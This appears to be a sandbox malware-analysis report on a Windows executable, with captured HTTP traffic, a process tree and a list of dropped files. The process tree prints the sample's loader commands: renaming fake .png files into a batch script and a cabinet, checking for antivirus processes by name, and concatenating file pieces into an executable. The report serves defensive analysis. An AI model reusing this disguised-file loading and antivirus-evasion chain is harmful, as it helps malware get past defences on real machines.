2025-03-07 15:24:24 UTC	805	IN	Data Raw: 31 31 63 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 11c5<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2025-03-07 15:24:24 UTC	1369	IN	Data Raw: 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d Data Ascii: n-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElem
2025-03-07 15:24:24 UTC	1369	IN	Data Raw: 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <for
2025-03-07 15:24:24 UTC	1014	IN	Data Raw: 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 37 36 2e 39 39 2e 32 33 32 2e 31 30 35 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 Data Ascii: " class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">76.99.232.105</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><spa
2025-03-07 15:24:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	10:23:37
Start date:	07/03/2025
Path:	C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe"
Imagebase:	0x400000
File size:	70'254'595 bytes
MD5 hash:	B0EA3BCB6A802DEB7952EE8BD7780707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:23:39
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c expand Labeled.png Labeled.png.bat & Labeled.png.bat
Imagebase:	0xc70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:23:39
Start date:	07/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62fc20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:23:39
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\expand.exe
Wow64 process (32bit):	true
Commandline:	expand Labeled.png Labeled.png.bat
Imagebase:	0xe90000
File size:	53'248 bytes
MD5 hash:	544B0DBFF3F393BCE8BB9D815F532D51
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:23:42
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x750000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:23:42
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0x2b0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:23:43
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x750000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:23:43
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
Imagebase:	0x2b0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:23:44
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 362398
Imagebase:	0xc70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:23:44
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E Peterson.png
Imagebase:	0xf30000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:23:45
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "loops" Lost
Imagebase:	0x2b0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:23:45
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b 362398\Print.com + Pounds + Lyrics + Msg + Blvd + Inserted + Comparison + Machinery + Olympus + Isaac + Withdrawal 362398\Print.com
Imagebase:	0xc70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:23:45
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Based.png + ..\Facilities.png + ..\Christopher.png + ..\Page.png + ..\Trailers.png + ..\Seminars.png + ..\Sims.png t
Imagebase:	0xc70000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:23:45
Start date:	07/03/2025
Path:	C:\Users\user\AppData\Local\Temp\362398\Print.com
Wow64 process (32bit):	true
Commandline:	Print.com t
Imagebase:	0x4f0000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	10:23:45
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x2b0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	10:24:46
Start date:	07/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62fc20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	18%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.7%
Total number of Nodes:	1526
Total number of Limit Nodes:	33

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Sigma Signatures

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\362398\Print.com

C:\Users\user\AppData\Local\Temp\362398\t

C:\Users\user\AppData\Local\Temp\Based.png

C:\Users\user\AppData\Local\Temp\Blvd

C:\Users\user\AppData\Local\Temp\Christopher.png

C:\Users\user\AppData\Local\Temp\Comparison

C:\Users\user\AppData\Local\Temp\Facilities.png

C:\Users\user\AppData\Local\Temp\Inserted

C:\Users\user\AppData\Local\Temp\Isaac

C:\Users\user\AppData\Local\Temp\Labeled.png

C:\Users\user\AppData\Local\Temp\Lost

C:\Users\user\AppData\Local\Temp\Lyrics

C:\Users\user\AppData\Local\Temp\Machinery

C:\Users\user\AppData\Local\Temp\Msg

C:\Users\user\AppData\Local\Temp\Olympus

C:\Users\user\AppData\Local\Temp\Page.png

Windows Analysis Report
#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe